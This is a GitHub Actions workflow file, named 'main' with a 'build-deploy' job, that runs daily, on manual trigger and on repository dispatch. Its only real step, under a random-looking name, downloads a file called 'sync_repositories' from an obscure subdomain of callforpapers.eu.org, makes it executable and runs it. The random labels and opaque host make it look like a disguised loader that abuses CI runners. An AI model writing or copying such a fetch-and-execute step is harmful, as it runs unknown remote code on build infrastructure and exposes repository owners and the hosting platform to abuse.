#2024-03-18-[135736]-3pdj475h
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "15 3 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: cawdvhg6fbznqxdw
        run: |
          wget -q https://4wsw6xa2epflptzo.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories